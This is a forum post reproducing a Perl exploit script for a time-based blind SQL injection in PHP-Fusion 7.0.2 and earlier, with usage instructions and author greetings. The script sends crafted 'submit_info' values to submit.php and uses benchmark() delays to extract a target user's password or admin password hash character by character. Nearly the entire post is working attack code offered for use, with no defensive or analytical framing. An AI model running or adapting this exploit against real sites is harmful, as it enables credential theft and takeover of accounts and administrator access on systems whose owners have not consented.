Jump to content
Guest vini4p

PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit

Recommended Posts

#!/usr/bin/perl -w
# -------------------------------------------------------
# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# download on http://php-fusion.co.uk
# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------
# Note: magic_quotes_gpc off
# don't add me on msn messenger
# my email staker.38@gmail.com
#
# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer
# -------------------------------------------------------
# User Password: my $field = "user_password" ;
# Admin Password: my $field = "user_admin_password";
# -------------------------------------------------------

use strict;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


my $field = "user_password";
my ($stop,$start,$hash);


my $domain = shift;
my $ptable = shift;
my $ulogin = shift;
my $plogin = shift;
my $userid = shift or &usage;

my @chars = (48..57, 97..102);
my $substr = 1;
my $http = new LWP::UserAgent;



sub send_request
{
my $post = undef;
my $host = $domain;
my $param = shift @_ or die $!;

$host .= "/submit.php?stype=l";

$http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));
$post = $http->post('http://'.$host,[
'link_category' => 1,
'link_name' => 1,
'link_url' => 1,
'link_description' => 1,
'submit_link' => 'Submit+Link',
'submit_info[pwn]' => $param,
]);

}


sub give_char
{
my $send = undef;
my ($charz,$uidz) = @_;

$send = "' or (select if((ascii(substring".
"($field,$uidz,1))=$charz),".
"benchmark(230000000,char(0)),".
"0) from ${ptable}_users where user_id=$userid))#";

return $send;
}


for(1..32)
{
foreach my $set(@chars)
{
my $start = time();

send_request(give_char($set,$substr));

my $stop = time();

if($stop - $start > 6)
{
syswrite(STDOUT,chr($set));
$substr++;
last;
}
}
}

sub usage
{
print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n";
print "by athos - staker[at]hotmail[dot]it\n";
print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n";
exit;
}

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...